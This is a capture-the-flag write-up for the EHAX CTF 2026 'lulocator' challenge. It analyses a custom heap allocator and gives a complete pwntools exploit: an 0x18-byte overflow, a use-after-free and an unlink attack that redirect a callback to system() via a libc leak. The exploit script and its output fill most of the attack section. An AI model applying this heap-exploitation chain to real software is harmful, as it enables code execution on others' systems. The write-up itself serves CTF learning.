EHAX CTF 2026 - lulocator - Binary Exploitation Writeup

Category: Binary Exploitation

Flag: EH4X{unf0rtun4t3ly_th3_lul_1s_0n_m3}

Challenge Description#

Who needs that buggy malloc? Made my own completely safe lulocator.

Analysis#

The handout immediately telegraphed the shape of the challenge: one custom allocator binary plus an exact libc, which usually means the intended exploit path is inside the program’s own heap logic, not glibc internals.

1
unzip -l "/home/LIGHT/Downloads/handout_lulocator.zip"

1
Archive:  /home/LIGHT/Downloads/handout_lulocator.zip
2
  Length      Date    Time    Name
3
---------  ---------- -----   ----
4
      297  02-28-2026 00:45   handout/Makefile
5
    16608  02-28-2026 00:47   handout/lulocator
6
  2220400  02-28-2026 00:47   handout/libc.so.6
7
       30  02-27-2026 23:57   handout/flag.txt

1
file "./lulocator"

1
./lulocator: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, ... stripped

1
checksec --file="./lulocator"

1
[*] '/home/LIGHT/Downloads/handout/lulocator'
2
    Arch:       amd64-64-little
3
    RELRO:      No RELRO
4
    Stack:      No canary found
5
    NX:         NX enabled
6
    PIE:        No PIE (0x400000)
7
    SHSTK:      Enabled
8
    IBT:        Enabled

No PIE and no canary were nice, but this was not a direct stack-overflow binary. The menu and decompilation showed a custom heap object model with a global “runner” pointer and an indirect callback dispatch, which is exactly where I focused.

1
strings -a -n 4 "./lulocator" | rg -i "allocator: corrupted free list detected|\[new\]|\[info\]|set_runner|=== lulocator ==="

1
allocator: corrupted free list detected
2
[new] index=%d
3
[info] addr=0x%lx out=0x%lx len=%lu
4
=== lulocator ===
5
5) set_runner

1
r2 -Aqc "s 0x401e0d; pdg" "./lulocator"

1
void fcn.00401e0d(void)
2
{
3
    if (*0x404940 == 0) {
4
        sym.imp.puts("[no runner]");
5
    }
6
    else {
7
        (**(*0x404940 + 0x10))(*0x404940 + 0x28);
8
    }
9
}

That one function gives the whole endgame: if I can make the global runner (0x404940) point to attacker data, I control both the called function pointer at runner+0x10 and its argument pointer runner+0x28.

1
r2 -Aqc "s 0x401d3d; pdg" "./lulocator"

1
void fcn.00401d3d(void)
2
{
3
    ...
4
    *0x404940 = *(var_44h * 8 + 0x4048c0);
5
    sym.imp.puts("[runner set]");
6
}

1
r2 -Aqc "s 0x401978; pdg" "./lulocator"

1
void fcn.00401978(void)
2
{
3
    ...
4
    if (*(var_18h + 0x20) + 0x18U < var_70h) {
5
        sym.imp.puts("too long");
6
        return;
7
    }
8
    ...
9
    fcn.00401636(0, var_18h + 0x28, var_70h);
10
}

This is the bug: write length is allowed up to chunk_len + 0x18, but write target starts at chunk+0x28. So each chunk can overwrite 0x18 bytes past its own data region—perfect for corrupting the metadata of the physically next chunk.

1
r2 -Aqc "s 0x4012f2; pdg" "./lulocator"

1
void fcn.004012f2(uint32_t arg1)
2
{
3
    ...
4
    if ((piVar1 == *(*piVar1 + 8)) && (piVar1 == *piVar1[1])) {
5
        *piVar1[1] = *piVar1;
6
        *(*piVar1 + 8) = piVar1[1];
7
        return;
8
    }
9
    sym.imp.fwrite("allocator: corrupted free list detected\n", ...);
10
    sym.imp.abort();
11
}

That unlink check is classic and bypassable with fake fd/bk setup. The reliable chain was: allocate A and R adjacent, set runner to R, free R (runner becomes stale UAF), overflow from A into freed R’s free-list pointers, then trigger allocation to unlink R and overwrite runner with an attacker-controlled fake object inside A’s data.

smug

The info command gave two essential leaks in one line: chunk address for precise fake-object placement and stdout pointer for libc base recovery. Since a challenge libc was provided in the handout, the exploit resolves system from that exact libc and uses the leak to compute libc_base on the fly.

With runner -> fake_object, fake_object+0x10 = system, and fake_object+0x28 = command string, run becomes system(command). I used a multi-path cat command so the exploit would survive unknown remote flag paths, and the first full remote execution returned the real flag twice in stdout.

1
python3.12 "./exploit.py" REMOTE

1
[x] Opening connection to chall.ehax.in on port 40137
2
[+] chunk A @ 0x7dda42bfe008
3
[+] chunk R @ 0x7dda42bfe138
4
[+] stdout leak = 0x7dda42e5c780
5
[+] libc base   = 0x7dda42c41000
6
[+] system      = 0x7dda42c91d70
7
EH4X{unf0rtun4t3ly_th3_lul_1s_0n_m3}
8
...
9
FLAG_FOUND: EH4X{unf0rtun4t3ly_th3_lul_1s_0n_m3}

Solution#

1
from pwn import *
2
import re
3

4
HOST = "chall.ehax.in"
5
PORT = 40137
6

7
libc = ELF("./libc.so.6", checksec=False)
8

9
def cmd(io, choice: int):
10
    io.sendlineafter(b"> ", str(choice).encode())
11

12
def new(io, size: int) -> int:
13
    cmd(io, 1)
14
    io.sendlineafter(b"size: ", str(size).encode())
15
    io.recvuntil(b"[new] index=")
16
    return int(io.recvline().strip())
17

18
def write_idx(io, idx: int, length: int, data: bytes):
19
    cmd(io, 2)
20
    io.sendlineafter(b"idx: ", str(idx).encode())
21
    io.sendlineafter(b"len: ", str(length).encode())
22
    io.sendafter(b"data: ", data)
23
    io.recvline()
24

25
def delete(io, idx: int):
26
    cmd(io, 3)
27
    io.sendlineafter(b"idx: ", str(idx).encode())
28
    io.recvline()
29

30
def info(io, idx: int):
31
    cmd(io, 4)
32
    io.sendlineafter(b"idx: ", str(idx).encode())
33
    line = io.recvline().decode(errors="ignore").strip()
34
    m = re.search(r"addr=0x([0-9a-fA-F]+) out=0x([0-9a-fA-F]+) len=(\d+)", line)
35
    if not m:
36
        raise RuntimeError(f"bad info line: {line!r}")
37
    return int(m.group(1), 16), int(m.group(2), 16)
38

39
def set_runner(io, idx: int):
40
    cmd(io, 5)
41
    io.sendlineafter(b"idx: ", str(idx).encode())
42
    io.recvline()
43

44
def main():
45
    io = remote(HOST, PORT)
46

47
    a = new(io, 0x100)
48
    r = new(io, 0x100)
49

50
    a_addr, out_ptr = info(io, a)
51
    r_addr, _ = info(io, r)
52

53
    libc.address = out_ptr - libc.symbols["_IO_2_1_stdout_"]
54
    system = libc.symbols["system"]
55

56
    set_runner(io, r)
57
    delete(io, r)
58

59
    command = (
60
        b"cat flag.txt 2>/dev/null; cat /flag.txt 2>/dev/null; "
61
        b"cat /flag 2>/dev/null; cat /app/flag.txt 2>/dev/null; "
62
        b"cat /home/*/flag.txt 2>/dev/null; echo __END__\x00"
63
    )
64

65
    fake = a_addr + 0x28
66
    payload = bytearray(b"A" * (0x100 + 0x18))
67

68
    # fake object at `fake`
69
    payload[0x08:0x10] = p64(r_addr)        # for unlink check
70
    payload[0x10:0x18] = p64(system)        # callback
71
    payload[0x28:0x28 + len(command)] = command
72

73
    # overwrite freed R chunk metadata via +0x18 OOB write
74
    payload[0x100:0x108] = p64(0x130)       # keep size
75
    payload[0x108:0x110] = p64(fake)        # fd
76
    payload[0x110:0x118] = p64(0x404940)    # bk -> &runner
77

78
    write_idx(io, a, len(payload), bytes(payload))
79
    new(io, 0x80)  # trigger unlink => runner = fake
80

81
    cmd(io, 6)     # run => system(fake+0x28)
82
    out = io.recvuntil(b"__END__", timeout=3)
83
    print(out.decode(errors="ignore"))
84

85
if __name__ == "__main__":
86
    main()

1
python3.12 solve.py

1
EH4X{unf0rtun4t3ly_th3_lul_1s_0n_m3}